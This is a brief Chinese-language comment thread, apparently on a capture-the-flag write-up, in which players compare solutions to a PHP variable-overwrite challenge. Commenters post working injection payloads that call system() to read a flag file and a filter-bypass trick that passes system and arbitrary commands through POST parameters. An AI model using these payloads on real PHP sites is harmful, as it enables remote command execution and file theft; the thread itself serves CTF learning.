?S=a;system("cat /var/flag.txt"); # 好像是命令注入吧知识点(心虚
y1ngy1ngy1ng 我用的是 S=a=system('cat ../flag.txt'); 貌似也可以。
预期以为藏深一点,就能吊一个webshell,没想到大佬们还是找到了
你的双引号用错了,应该用英文。(菜鸡路过,我潜
我的麻烦了,但是挺骚的 S=_POST[1]('ls'); 然后 post传 1=system,或者碰到过滤可以 S=_POST[1]($_POST[2]); 然后传 1=system&2=ls
为啥我是直接S=S= 这样来的,又学到了hhh
Jazz 预期解就这样,变量覆盖